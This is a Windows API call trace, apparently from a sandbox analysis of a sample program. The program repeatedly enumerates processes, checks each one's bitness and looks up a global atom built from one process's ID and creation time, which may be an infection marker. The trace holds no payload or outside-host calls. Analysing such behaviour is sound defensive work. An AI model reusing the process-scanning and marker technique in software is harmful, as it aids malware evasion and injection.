	[0118.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.403] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.403] CloseHandle (hObject=0x698) returned 1
	[0118.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.403] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.403] CloseHandle (hObject=0x698) returned 1
	[0118.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.403] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.403] CloseHandle (hObject=0x698) returned 1
	[0118.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.404] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.404] CloseHandle (hObject=0x698) returned 1
	[0118.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.404] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.404] CloseHandle (hObject=0x698) returned 1
	[0118.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.404] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.404] CloseHandle (hObject=0x698) returned 1
	[0118.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.405] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.405] CloseHandle (hObject=0x698) returned 1
	[0118.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.405] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.405] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.405] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.406] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.406] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.406] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.406] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.406] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.406] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.406] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.407] CloseHandle (hObject=0x698) returned 1
	[0118.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.407] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.407] CloseHandle (hObject=0x698) returned 1
	[0118.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.407] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.407] CloseHandle (hObject=0x698) returned 1
	[0118.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.407] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.407] CloseHandle (hObject=0x698) returned 1
	[0118.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.443] CloseHandle (hObject=0x698) returned 1
	[0118.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.443] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.443] CloseHandle (hObject=0x698) returned 1
	[0118.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.444] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.444] CloseHandle (hObject=0x698) returned 1
	[0118.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.444] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.444] CloseHandle (hObject=0x698) returned 1
	[0118.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.444] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.444] CloseHandle (hObject=0x698) returned 1
	[0118.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.445] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.445] CloseHandle (hObject=0x698) returned 1
	[0118.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.445] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.445] CloseHandle (hObject=0x698) returned 1
	[0118.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.445] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.445] CloseHandle (hObject=0x698) returned 1
	[0118.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.446] CloseHandle (hObject=0x698) returned 1
	[0118.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.446] CloseHandle (hObject=0x698) returned 1
	[0118.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.446] CloseHandle (hObject=0x698) returned 1
	[0118.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.446] CloseHandle (hObject=0x698) returned 1
	[0118.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.446] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.446] CloseHandle (hObject=0x698) returned 1
	[0118.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.447] CloseHandle (hObject=0x698) returned 1
	[0118.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.447] CloseHandle (hObject=0x698) returned 1
	[0118.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.447] CloseHandle (hObject=0x698) returned 1
	[0118.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.447] CloseHandle (hObject=0x698) returned 1
	[0118.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.447] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.447] CloseHandle (hObject=0x698) returned 1
	[0118.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.448] CloseHandle (hObject=0x698) returned 1
	[0118.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.448] CloseHandle (hObject=0x698) returned 1
	[0118.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.448] CloseHandle (hObject=0x698) returned 1
	[0118.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.448] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.448] CloseHandle (hObject=0x698) returned 1
	[0118.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.449] CloseHandle (hObject=0x698) returned 1
	[0118.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.449] CloseHandle (hObject=0x698) returned 1
	[0118.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.449] CloseHandle (hObject=0x698) returned 1
	[0118.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.449] CloseHandle (hObject=0x698) returned 1
	[0118.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.449] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.449] CloseHandle (hObject=0x698) returned 1
	[0118.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.450] CloseHandle (hObject=0x698) returned 1
	[0118.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.450] CloseHandle (hObject=0x698) returned 1
	[0118.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.450] CloseHandle (hObject=0x698) returned 1
	[0118.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.450] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.450] CloseHandle (hObject=0x698) returned 1
	[0118.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.451] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.451] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.451] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.452] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.452] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.452] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.452] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.452] CloseHandle (hObject=0x698) returned 1
	[0118.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.453] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.453] CloseHandle (hObject=0x698) returned 1
	[0118.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.453] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.453] CloseHandle (hObject=0x698) returned 1
	[0118.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.453] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.453] CloseHandle (hObject=0x698) returned 1
	[0118.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.488] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.488] CloseHandle (hObject=0x698) returned 1
	[0118.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.489] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.489] CloseHandle (hObject=0x698) returned 1
	[0118.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.489] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.489] CloseHandle (hObject=0x698) returned 1
	[0118.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.490] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.490] CloseHandle (hObject=0x698) returned 1
	[0118.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.490] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.490] CloseHandle (hObject=0x698) returned 1
	[0118.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.490] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.490] CloseHandle (hObject=0x698) returned 1
	[0118.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.490] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.490] CloseHandle (hObject=0x698) returned 1
	[0118.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.490] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.490] CloseHandle (hObject=0x698) returned 1
	[0118.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.491] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.491] CloseHandle (hObject=0x698) returned 1
	[0118.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.491] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.491] CloseHandle (hObject=0x698) returned 1
	[0118.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.491] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.491] CloseHandle (hObject=0x698) returned 1
	[0118.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.491] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.491] CloseHandle (hObject=0x698) returned 1
	[0118.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.491] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.491] CloseHandle (hObject=0x698) returned 1
	[0118.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.492] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.492] CloseHandle (hObject=0x698) returned 1
	[0118.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.492] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.492] CloseHandle (hObject=0x698) returned 1
	[0118.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.492] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.492] CloseHandle (hObject=0x698) returned 1
	[0118.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.492] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.492] CloseHandle (hObject=0x698) returned 1
	[0118.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.493] CloseHandle (hObject=0x698) returned 1
	[0118.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.493] CloseHandle (hObject=0x698) returned 1
	[0118.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.493] CloseHandle (hObject=0x698) returned 1
	[0118.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.493] CloseHandle (hObject=0x698) returned 1
	[0118.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.493] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.494] CloseHandle (hObject=0x698) returned 1
	[0118.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.494] CloseHandle (hObject=0x698) returned 1
	[0118.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.494] CloseHandle (hObject=0x698) returned 1
	[0118.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.494] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.494] CloseHandle (hObject=0x698) returned 1
	[0118.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.495] CloseHandle (hObject=0x698) returned 1
	[0118.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.495] CloseHandle (hObject=0x698) returned 1
	[0118.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.495] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.495] CloseHandle (hObject=0x698) returned 1
	[0118.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.496] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.496] CloseHandle (hObject=0x698) returned 1
	[0118.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.496] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.496] CloseHandle (hObject=0x698) returned 1
	[0118.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.496] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.496] CloseHandle (hObject=0x698) returned 1
	[0118.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
